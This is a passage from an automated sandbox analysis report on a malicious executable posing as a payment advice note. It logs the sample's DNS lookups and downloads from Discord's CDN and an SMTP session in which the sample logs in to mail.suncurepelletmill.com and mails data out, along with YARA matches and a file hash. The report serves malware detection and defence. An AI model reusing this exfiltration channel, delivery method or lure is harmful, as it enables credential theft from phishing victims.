                                                                                                                                                Nov 20, 2020 11:27:17.635934114 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635957003 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635966063 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635972023 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635981083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636003017 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636023998 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636045933 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636060953 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636066914 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636068106 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636090040 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636111021 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636135101 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636143923 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636149883 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636161089 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636185884 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636208057 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636210918 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.636214018 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.636600971 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.735481024 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:37.443619013 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:39.345614910 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:28:38.740766048 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:38.902412891 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:38.902585983 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:39.253923893 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:39.254440069 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:39.416418076 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:39.418677092 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:39.580845118 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:39.582135916 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:39.751188040 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:39.752032995 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:39.913867950 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:39.914614916 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.077241898 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.077750921 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.239362955 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.239437103 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.241774082 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.242023945 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.243041992 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.243258953 CET49769587192.168.2.4192.186.237.168
                                                                                                                                                Nov 20, 2020 11:28:40.403538942 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.404472113 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.414588928 CET58749769192.186.237.168192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:40.459661961 CET49769587192.168.2.4192.186.237.168

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:26:32.792489052 CET6238953192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:32.819657087 CET53623898.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:35.601994991 CET4991053192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:35.629121065 CET53499108.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:36.283905029 CET5585453192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:36.311135054 CET53558548.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:37.126955032 CET6454953192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:37.154706955 CET53645498.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:37.792318106 CET6315353192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:37.819264889 CET53631538.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:38.827524900 CET5299153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:38.854659081 CET53529918.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.186790943 CET5370053192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET53537008.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.320950985 CET5172653192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET53517268.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.776696920 CET5679453192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:39.803807020 CET53567948.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:40.474920988 CET5653453192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:40.502110004 CET53565348.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:43.134888887 CET5662753192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:43.170541048 CET53566278.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:43.941832066 CET5662153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:43.968853951 CET53566218.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:45.275043964 CET6311653192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:45.302392960 CET53631168.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:45.946240902 CET6407853192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:45.973328114 CET53640788.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:46.632827997 CET6480153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:46.659902096 CET53648018.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:48.414572954 CET6172153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:48.441579103 CET53617218.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:49.274547100 CET5125553192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:26:49.301678896 CET53512558.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:00.108504057 CET6152253192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:00.135812044 CET53615228.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.561269999 CET5233753192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET53523378.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.743603945 CET5504653192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET53550468.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.017287970 CET4961253192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET53496128.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.254802942 CET4928553192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET53492858.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:19.579334974 CET5060153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:19.606564999 CET53506018.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:27.568802118 CET6087553192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:27.604479074 CET53608758.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:29.021965027 CET5644853192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:29.057634115 CET53564488.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:30.008707047 CET5917253192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:30.046601057 CET53591728.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:30.880028963 CET6242053192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:30.915757895 CET53624208.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:32.223314047 CET6057953192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:32.259016037 CET53605798.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:34.161514997 CET5018353192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:34.197279930 CET53501838.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:34.857017994 CET6153153192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:34.892985106 CET53615318.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:35.454413891 CET4922853192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:35.481477022 CET53492288.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:35.776987076 CET5979453192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:35.812496901 CET53597948.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:37.052122116 CET5591653192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:37.087802887 CET53559168.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:37.744098902 CET5275253192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:37.781842947 CET53527528.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:43.113318920 CET6054253192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:27:43.154879093 CET53605428.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:10.708352089 CET6068953192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:28:10.735510111 CET53606898.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:12.690224886 CET6420653192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:28:12.717282057 CET53642068.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:38.509129047 CET5090453192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:28:38.551346064 CET53509048.8.8.8192.168.2.4
                                                                                                                                                Nov 20, 2020 11:28:38.563013077 CET5752553192.168.2.48.8.8.8
                                                                                                                                                Nov 20, 2020 11:28:38.605150938 CET53575258.8.8.8192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Nov 20, 2020 11:26:39.186790943 CET192.168.2.48.8.8.80xf2f2Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.320950985 CET192.168.2.48.8.8.80xeb99Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.561269999 CET192.168.2.48.8.8.80x8397Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.743603945 CET192.168.2.48.8.8.80x49bfStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.017287970 CET192.168.2.48.8.8.80x10dcStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.254802942 CET192.168.2.48.8.8.80xe9b5Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.509129047 CET192.168.2.48.8.8.80x25c6Standard query (0)mail.suncurepelletmill.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.563013077 CET192.168.2.48.8.8.80x717dStandard query (0)mail.suncurepelletmill.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET8.8.8.8192.168.2.40xf2f2No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET8.8.8.8192.168.2.40xf2f2No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET8.8.8.8192.168.2.40xf2f2No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET8.8.8.8192.168.2.40xf2f2No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.213973999 CET8.8.8.8192.168.2.40xf2f2No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET8.8.8.8192.168.2.40xeb99No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET8.8.8.8192.168.2.40xeb99No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET8.8.8.8192.168.2.40xeb99No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET8.8.8.8192.168.2.40xeb99No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:26:39.348053932 CET8.8.8.8192.168.2.40xeb99No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET8.8.8.8192.168.2.40x8397No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET8.8.8.8192.168.2.40x8397No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET8.8.8.8192.168.2.40x8397No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET8.8.8.8192.168.2.40x8397No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.588347912 CET8.8.8.8192.168.2.40x8397No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET8.8.8.8192.168.2.40x49bfNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET8.8.8.8192.168.2.40x49bfNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET8.8.8.8192.168.2.40x49bfNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET8.8.8.8192.168.2.40x49bfNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:06.770800114 CET8.8.8.8192.168.2.40x49bfNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET8.8.8.8192.168.2.40x10dcNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET8.8.8.8192.168.2.40x10dcNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET8.8.8.8192.168.2.40x10dcNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET8.8.8.8192.168.2.40x10dcNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.044492960 CET8.8.8.8192.168.2.40x10dcNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET8.8.8.8192.168.2.40xe9b5No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET8.8.8.8192.168.2.40xe9b5No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET8.8.8.8192.168.2.40xe9b5No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET8.8.8.8192.168.2.40xe9b5No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:27:17.281923056 CET8.8.8.8192.168.2.40xe9b5No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.551346064 CET8.8.8.8192.168.2.40x25c6No error (0)mail.suncurepelletmill.comsuncurepelletmill.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.551346064 CET8.8.8.8192.168.2.40x25c6No error (0)suncurepelletmill.com192.186.237.168A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.605150938 CET8.8.8.8192.168.2.40x717dNo error (0)mail.suncurepelletmill.comsuncurepelletmill.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:28:38.605150938 CET8.8.8.8192.168.2.40x717dNo error (0)suncurepelletmill.com192.186.237.168A (IP address)IN (0x0001)

                                                                                                                                                HTTPS Packets

                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                Nov 20, 2020 11:26:39.402235985 CET162.159.135.233443192.168.2.449734CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                                                                CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                Nov 20, 2020 11:27:06.835222006 CET162.159.135.233443192.168.2.449747CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                                                                CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                Nov 20, 2020 11:27:17.350728035 CET162.159.133.233443192.168.2.449749CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                                                                CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                SMTP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                Nov 20, 2020 11:28:39.253923893 CET58749769192.186.237.168192.168.2.4220-p3plcpnl0152.prod.phx3.secureserver.net ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 03:28:39 -0700
                                                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                220 and/or bulk e-mail.
                                                                                                                                                Nov 20, 2020 11:28:39.254440069 CET49769587192.168.2.4192.186.237.168EHLO 367706
                                                                                                                                                Nov 20, 2020 11:28:39.416418076 CET58749769192.186.237.168192.168.2.4250-p3plcpnl0152.prod.phx3.secureserver.net Hello 367706 [84.17.52.25]
                                                                                                                                                250-SIZE 52428800
                                                                                                                                                250-8BITMIME
                                                                                                                                                250-PIPELINING
                                                                                                                                                250-AUTH PLAIN LOGIN
                                                                                                                                                250-CHUNKING
                                                                                                                                                250-STARTTLS
                                                                                                                                                250-SMTPUTF8
                                                                                                                                                250 HELP
                                                                                                                                                Nov 20, 2020 11:28:39.418677092 CET49769587192.168.2.4192.186.237.168AUTH login Q3J5c3RhbEBzdW5jdXJlcGVsbGV0bWlsbC5jb20=
                                                                                                                                                Nov 20, 2020 11:28:39.580845118 CET58749769192.186.237.168192.168.2.4334 UGFzc3dvcmQ6
                                                                                                                                                Nov 20, 2020 11:28:39.751188040 CET58749769192.186.237.168192.168.2.4235 Authentication succeeded
                                                                                                                                                Nov 20, 2020 11:28:39.752032995 CET49769587192.168.2.4192.186.237.168MAIL FROM:<Crystal@suncurepelletmill.com>
                                                                                                                                                Nov 20, 2020 11:28:39.913867950 CET58749769192.186.237.168192.168.2.4250 OK
                                                                                                                                                Nov 20, 2020 11:28:39.914614916 CET49769587192.168.2.4192.186.237.168RCPT TO:<Crystal@suncurepelletmill.com>
                                                                                                                                                Nov 20, 2020 11:28:40.077241898 CET58749769192.186.237.168192.168.2.4250 Accepted
                                                                                                                                                Nov 20, 2020 11:28:40.077750921 CET49769587192.168.2.4192.186.237.168DATA
                                                                                                                                                Nov 20, 2020 11:28:40.239437103 CET58749769192.186.237.168192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                                                                Nov 20, 2020 11:28:40.243258953 CET49769587192.168.2.4192.186.237.168.
                                                                                                                                                Nov 20, 2020 11:28:40.414588928 CET58749769192.186.237.168192.168.2.4250 OK id=1kg3ei-00An1k-5o

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 3912 Parent PID: 6024

                                                                                                                                                General

                                                                                                                                                Start time:11:26:37
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE'
                                                                                                                                                Imagebase:0x7ffabd480000
                                                                                                                                                File size:1346928 bytes
                                                                                                                                                MD5 hash:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000002.697786352.0000000002E07000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                                                                • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000002.697786352.0000000002E07000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 4460 Parent PID: 3912

                                                                                                                                                General

                                                                                                                                                Start time:11:26:53
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                Imagebase:0x7ffabd480000
                                                                                                                                                File size:1346928 bytes
